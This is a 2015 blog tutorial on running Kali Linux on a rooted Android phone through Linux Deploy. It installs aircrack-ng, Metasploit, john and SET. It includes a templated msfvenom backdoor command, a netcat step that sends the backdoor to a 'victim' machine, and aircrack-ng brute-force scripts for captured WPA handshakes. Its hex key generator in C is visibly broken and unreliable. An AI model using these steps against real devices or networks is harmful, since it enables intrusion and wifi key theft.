mardi 17 mars 2015

Kali Linux on Android Phone with Metasploit, Aircrack ng, John, Tmux...

Hello everyone !

I was so glad to know the release of Nethunter 1.1 on offensive security, so I immediattely decided to tried it on my Nexus 4. But It didn't really work as Nexus 4 devices doesn't really support USB external devices :/ even if XDA devs did release a patch for this, it made WIFI disapear...

That's why I decided to use Linux Deploy in a new way : I thought this app was really limited, but finally I managed to get something really similar to a Nethunter device !

So here we are, and I'm gonna show you a few steps to install and configure kali linux with some tools !

1) Root your phone

2) Dowload Linux Deploy

3) Download the Kali image BUT :

The installator will automatically generate a 4Gb image in your internal memory - which is relally big - thats why you might have two solutions :

- Use an external sdcard but it would be a waste of memory

- BETTER SOLUTION : Tap on "Image size (MB)" and enter the amount of memory youwant to allocate. I suggest 2200 MB (2,2GB)

Then, go to "Compents to install, and UNCHECK EVERYTHING EXCEPT -> SSH SERVER.

Thanks to this, your linux image will occupate 2,2Gb with a lot of freespace in it, so we'll be able to download some utilities, without getting useless things such as a graphical desktop.

So just click install and wait a few minute for the installation to complete.

So what ?

In order to connect to your new kali environnement you will need an ssh client (for we've only selected the ssh server and no VNC)

So just install a ssh client or use a terminal emulator such as "Terminal IDE" (and not the Jack Palevitch's one whisch has no built in ssh and i really dont like his emulator)

I personally prefer use the ssh client :

This one is light efficient and not intrusive.

You might also want to install the "Hacker's keyboard" or use the "Terminal IDE"'s one. You'll surely need it, as the arrows, esc and ctrl keys are really useful.

Then, launch your system via the "Launch" button. You should have an output like this one :

EXCEPT THAT : You've only installed the ssh client so you output should look like : SSH :22 ... done

VNC :5900 ... fail


Now just launch your ssh client :

The default credentials are "android" and "changeme". So infront of "ssh" just type :

[ssh] android@localhost

And when the system ask you for the password , type "changeme".

Just have fun !!

TIP : If the display is too small, just use the volume keys to fix it.

NOW : Some basic steps

1) Checkout the space available : df -h

2) Get root : su

3) Install all the packages you want.

/WARNING\ : Smartphones chipsets doen't allow injection or monitor mode even if a few guys managed to. But iys eally experimental. You can use an external wifi card and heres the tutorial to do it :

Some things to install to have fun :

- aircrack-ng to break a 4 way handshake (tutorial below)

- Metasploit to send your backdoors (tutorial below)

- Tmux because were limite to only one window (script below)

- GCC to compile

- Vim to edit

1) Get root

For those who have issues to get root just follow these step

sudo passwd root

type twice your password

2) Install the packages :

apt-get install aircrack-ng

apt-get install metasploit

apt-get install metasploit-framework

apt-get install tmux

apt-get install john

3) If you wish to install SET :

cd /opt

sudo apt-get install git

git clone set/

cd set/

python install

Have fun.


You have to consider the fact that you're running a chrooted environment.

So, in order to access to the internal sotrage, yo have to go into Linux Deploy options : Scroll down to "Custom Mounts" and enable it. Then tap on "Mount points" and enable all the path presented. It will allow you, once you've booted your linux img to access all of your phone's data

Now you might i communicate with a pc for example, get your handsake and crack it on your phone, or send a backdoor generated on your phone ?

Here's another solution :

NETCAT. On a linux or windows machine with netcat here's a little metasploit fun :

On your kali PHONE

msfvenom /your/payload/ OPTIONS -a YOUR_ARCH -e exe and some stuff here > mybackdoor


On your victims's computer :

nc -l -p 1234 > mybackdoor

And now, no mattter how you managed to transfer the backdoor -netcat / usb cable/ any other hack - , let's play :

Proof of concept ? Here's a Metasploit shell gained on a linux machine :

AND..... PWNDED !! (yeah that was quite simple...)


And this Netcat trick works with ANY file.

For example : a captured handshake on a kali pc ! Tip : You can reduce it size with wpaclean :

wpaclean <out.cap> <in.cap>

How to crack the key ? Pipe Crunch into aircrack or john OR use this program if you want to generate HEXADECIMAL keys :



* HexKeygenerator is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published

* by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.


* HexKeygenerator is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.


* You should have received a copy of the GNU General Public License along with Foobar. If not, see



// Autheurs : Sdpbz1 and improved by romeoandjuliet

#include <stdio.h>

#include <stdlib.h>

#include <time.h>

void help(char name[]) {

printf("Usage:%s <Nb keys to generate> <file>\n\n", name);

printf("Exemple: generate 1000000 keys in the file dictionary.wpa\n");

printf("%s 10000000 dictionary.wpa\n", name);


int main(int argc, char * argv[])


long long int nb;

int size; //Key lenght

double i, z;

int byte = 0;


if(argc != 4) {


return 1;


//Convert to long and check

nb = atol(argv[1]);

if(nb == 0) {

printf("Please enter a valid number !!!\n");


return 1;


size = atol(argv[3]);

if(nb == 0) {

printf("Please enter a valid number\n");


return 1;


PF1 = fopen(argv[2], "w");

if (PF1 == NULL) {

printf("Cant create file %s\n", argv[2]);

return 1;


printf("Générating de %d hexadecimal keys\n", nb);


for(z = 1; z <= nb; z++) {

for (i = 1; i <= size; i++) {

byte = rand() % 256;

fprintf(PF1,"X", byte); //Hex display


if(z % 100000 == 0) {

printf("%l keys generated\n", z); // }




return 0;


To compile it :

gcc HexKeygnerator.c -o HexKeygnerator

Here's a first script to handle the crack :

for i in `seq 1 1000000``


./HexKeygenerator 1000000 password$i.lst 5 # for a 10 char hexadecimal key

aircrack-ng /path/to/handshake -e ESSID -w password$i.lst -p #NBOF_CORES >> log.txt # IF YOU USE ALL CORES AVAILABLE YOUR PHONE WILL ALMOST FREEZE

rm password$i.lst


grep "KEY FOUND" log.txt > KEY_FOUND # On sauve la clé

grep "KEY FOUND" log.txt

grep "KEY FOUND" log.txt



To have this run and be checked permanently in a TMUX session : Use this script and it ill automatically launch the previos script (save both in the same directory)


tmux split-window -h

tmux select-pane -t 0

tmux send-keys "sh ./" C-m

tmux select-pane -t 1

tmux send-keys "Watch -n 30 grep KEY log.txt" C-m

tmux split-window -v

tmux send-keys "Watch -n 30 tail log.txt" C-m # to check the cracking's speed

tmux select-window -t $SESSION:1

tmux -2 attach-session -t $SESSION

Screenshot ? :

And here it is. This is only the beginning ! thaths why i thing linux deploy is better and more modulable than nethunter.

Have fun !!!

If you liked this, please check my little website :) :


Pour les francophones, ce post existe en fracnais ssur l'excellent forum :


from xda-developers


Aucun commentaire:

Publier un commentaire